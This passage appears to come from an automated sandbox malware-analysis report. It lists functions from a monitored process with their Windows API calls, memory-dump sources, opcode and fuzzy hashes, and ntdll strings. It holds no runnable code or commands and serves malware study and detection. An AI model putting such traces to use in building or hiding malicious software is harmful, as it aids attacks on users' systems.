                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00479C52
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 535810a2220f2b74d42c3d5331bb41657a11b694ae2c637da9ad4097db73b4a7
                                          • Instruction ID: ee8f4205b153dfb9b2c3458898bc31a3ef831d4756c2cf4622f4b1f4c519b071
                                          • Opcode Fuzzy Hash: 535810a2220f2b74d42c3d5331bb41657a11b694ae2c637da9ad4097db73b4a7
                                          • Instruction Fuzzy Hash: A3F06D7368031436E631659ACC02FDB768CCB81BA1F25402AF70CEB6C0E999B80042E8
                                          Function 00499130 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00481429,?,004956C7,00481429,004950FF,004956C7,?,00481429,004950FF,00001000,?,?,00000000), ref: 0049916C
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: eeb72f86ac1694eb338319ebebae05c5e7828ef32382e1dfcef9ea1218520902
                                          • Instruction ID: 76a618b8cf942dc37e03421e972d39c1f21b7c7f22eae2d3d028631d9982e6d5
                                          • Opcode Fuzzy Hash: eeb72f86ac1694eb338319ebebae05c5e7828ef32382e1dfcef9ea1218520902
                                          • Instruction Fuzzy Hash: 95E06DB5200604BFC610EE59DC41FDB37ACEF8A714F00801AF908A7241D630B81187F9
                                          Function 00499180 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,03CA3305,00000007,00000000,00000004,00000000,004837D8,000000F4), ref: 004991BF
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 29c83403bbd505ee5ec20a26071bfde9c7c0d50249bc95c8e6454c34dea3c249
                                          • Instruction ID: 0ca9028962c696aa5f3fdc16d54178235a4b9d785c6f87a745df869dc37e821d
                                          • Opcode Fuzzy Hash: 29c83403bbd505ee5ec20a26071bfde9c7c0d50249bc95c8e6454c34dea3c249
                                          • Instruction Fuzzy Hash: 44E06D72200204BBCA10EE5ADC41FDB77ACEF85714F00801AF908A7241DA70B81087B8
                                          Function 00487B90 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,?,00481720,00497A3F,004950FF,004816ED), ref: 00487BC0
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 8a7a1827418aceb2d485039c96084f1b97a4fc422fe8e7a524b20ad6dfed6360
                                          • Instruction ID: 7660877e60f3a10bbbc027dbcabd4ebfe804cf5d74a0ae85d720ae8e515e6710
                                          • Opcode Fuzzy Hash: 8a7a1827418aceb2d485039c96084f1b97a4fc422fe8e7a524b20ad6dfed6360
                                          • Instruction Fuzzy Hash: 6BD05E727843097BE640FAE58C07F563A8C9B50798F18C469F90CD73C3DC59F80042A9
                                          Function 00487DB4 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE ref: 00487DC9
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: ff0786c7be1c80a510fb719f429cd852bf9a18e732b7d6f8577a580c574cfd01
                                          • Instruction ID: 99dbcd6af4de3f5880dd81aadfc99858724a6d62e6fb0299051d2f51e9d869cb
                                          • Opcode Fuzzy Hash: ff0786c7be1c80a510fb719f429cd852bf9a18e732b7d6f8577a580c574cfd01
                                          • Instruction Fuzzy Hash: ECD0A73111E6840AE71163FC68992B73F548F4336CB384A87E85DCF5E2C026C89EC311
                                          Function 00487B87 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,?,00481720,00497A3F,004950FF,004816ED), ref: 00487BC0
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 9123f07f5745e86bf8cdf3ce5e8eecff8a1ba06442f0ac63584fb8c2d5a45efd
                                          • Instruction ID: 39ff84887b79f36cb3de0741908ffb8582ac0ccdd1540762b036ba6899118f7a
                                          • Opcode Fuzzy Hash: 9123f07f5745e86bf8cdf3ce5e8eecff8a1ba06442f0ac63584fb8c2d5a45efd
                                          • Instruction Fuzzy Hash: 80C0125251D5C94AF313B2B41CA0379BFC40B5325BF2507D3D1C4810E6D5648654C2C2
                                          Function 02C12C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9f6bd1daf98a11d207b496ea9fc870aa85f4ed16c5a862a066805386fcfb5565
                                          • Instruction ID: a282c28f6a67cc0fc58703e163c0764645f079da4099906dac34f1fb4f4bf0ad
                                          • Opcode Fuzzy Hash: 9f6bd1daf98a11d207b496ea9fc870aa85f4ed16c5a862a066805386fcfb5565
                                          • Instruction Fuzzy Hash: 74B09B719419D5C6EA11E7604A09717790067D1701F15C161D3030641E4B38C1D5F176

                                          Non-executed Functions

                                          Function 02C12890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: b5c536855dff8c339f99f72ef4de252e3a24d6eaae737797078f8146c7395277
                                          • Instruction ID: 2d57347f68f34375596531d10707e8cdd369dd449796125bb35e76f2e5ca571a
                                          • Opcode Fuzzy Hash: b5c536855dff8c339f99f72ef4de252e3a24d6eaae737797078f8146c7395277
                                          • Instruction Fuzzy Hash: 645119B6A00126BFDB20DF9C8991A7EF7B8BF49200B508169E865D7645D734DF00DBE1
                                          Function 02C82410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: 63fda9dce4dbed61d0bb961860e2eb4b8ce3e9ea0c4b84a76ac4a090f89614c7
                                          • Instruction ID: 13610911d9aea856981ba49a4add427844ca4f87f74ddb3217a29b155958ad15
                                          • Opcode Fuzzy Hash: 63fda9dce4dbed61d0bb961860e2eb4b8ce3e9ea0c4b84a76ac4a090f89614c7
                                          • Instruction Fuzzy Hash: D2511775A40695AEDB30EF5CC89497FB7F9EF84208B40C46AE896D3641DB74EB00CB61
                                          Function 02C07630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                          Download Yara Rule
                                          Strings
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02C446FC
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02C44725
                                          • Execute=1, xrefs: 02C44713
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02C44742
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02C44655
                                          • ExecuteOptions, xrefs: 02C446A0
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 02C44787
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025
                                          • Opcode ID: 0769ef05f10bb26b279a8099fff68e9666154f605ff6bb7b9fc8c0c789a3e59b
                                          • Instruction ID: ae762b29c9fd7dc2f866e3fd9310f63619aae9541eb87d4cbdc3823b9cd77cfb
                                          • Opcode Fuzzy Hash: 0769ef05f10bb26b279a8099fff68e9666154f605ff6bb7b9fc8c0c789a3e59b
                                          • Instruction Fuzzy Hash: D4513931A002196AEF29ABA8DCD5FFAB3B9AF45304F1401D9E506A71D0DB70BA49DF50
                                          Function 02C820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$[$]:%u
                                          • API String ID: 48624451-2819853543
                                          • Opcode ID: 1ec9ca073ce015e4af75dc9e0d5eb28680f27ad8daa672ee2926b3ea758a111b
                                          • Instruction ID: 1d3e91bac7f2206daefc9e5217de5891327ff7c3a85b1bd05008007a47ddf533
                                          • Opcode Fuzzy Hash: 1ec9ca073ce015e4af75dc9e0d5eb28680f27ad8daa672ee2926b3ea758a111b
                                          • Instruction Fuzzy Hash: 35216576A00159ABDB10EF79CC44AFE7BF9EF94748F544126ED05E3200EB30DA159BA1
                                          Function 02C0B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                          Download Yara Rule
                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02C4728C
                                          Strings
                                          • RTL: Resource at %p, xrefs: 02C472A3
                                          • RTL: Re-Waiting, xrefs: 02C472C1
                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02C47294
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-605551621
                                          • Opcode ID: 19ed3e8bd151e3b58909afec2ef251b4d5a920ca0ceea1609265084dc258a124
                                          • Instruction ID: 846604ac01cdca1b5bf2da5c8f89840abcfd5a062db2e494fe9cc1482e80cac6
                                          • Opcode Fuzzy Hash: 19ed3e8bd151e3b58909afec2ef251b4d5a920ca0ceea1609265084dc258a124
                                          • Instruction Fuzzy Hash: 08412E71700212ABD720CE25CC81B6BB7A6FF95718F100619FD55EB280DB30E98ADBD1
                                          Function 02C82300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: 50b3f93146374464ec62ed1abcdc62d556cdc6d8437013675b1078f0bc04e906
                                          • Instruction ID: ae1e2cd0e733ac3bc71c38d3c6a91b2fa5adedbee04ee5eb423dafbf87b0840a
                                          • Opcode Fuzzy Hash: 50b3f93146374464ec62ed1abcdc62d556cdc6d8437013675b1078f0bc04e906
                                          • Instruction Fuzzy Hash: FD318476A002599FDB20DE29CC54BEEB7FDEF44614F944596EC49E3200EB30AA449FA1
                                          Function 02BD9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$@
                                          • API String ID: 0-1194432280
                                          • Opcode ID: d61c4bcb0017a3bd55272472be98b8286e25d13439ca985882b75bb174a6b048
                                          • Instruction ID: 40eb396c6c2fea6ba0d542a9f2f3fc7be4b3d8dc437e7f401040d9ee0b26de5e
                                          • Opcode Fuzzy Hash: d61c4bcb0017a3bd55272472be98b8286e25d13439ca985882b75bb174a6b048
                                          • Instruction Fuzzy Hash: 70811972D006699BDB21CB54CC45BEEB7B8AF48714F1045EAEA19B7240E7709E84CFA1
                                          Function 02C5CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                          Download Yara Rule
                                          APIs
                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 02C5CFBD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: CallFilterFunc@8
                                          • String ID: @$@4Cw@4Cw
                                          • API String ID: 4062629308-3101775584
                                          • Opcode ID: 5056e5c748b730bee55c3d201dde8928ef7934807b4cbf161bc5248008ded89c
                                          • Instruction ID: 9b9628dd94a17d94f8d17dfbf3f90479b966d5d602b31776af01691f5cfc7a59
                                          • Opcode Fuzzy Hash: 5056e5c748b730bee55c3d201dde8928ef7934807b4cbf161bc5248008ded89c
                                          • Instruction Fuzzy Hash: 9941CE71900364DFDB21DFA5C880AAEBBB9FF84B14F10456AED06DB250D734C981DBA4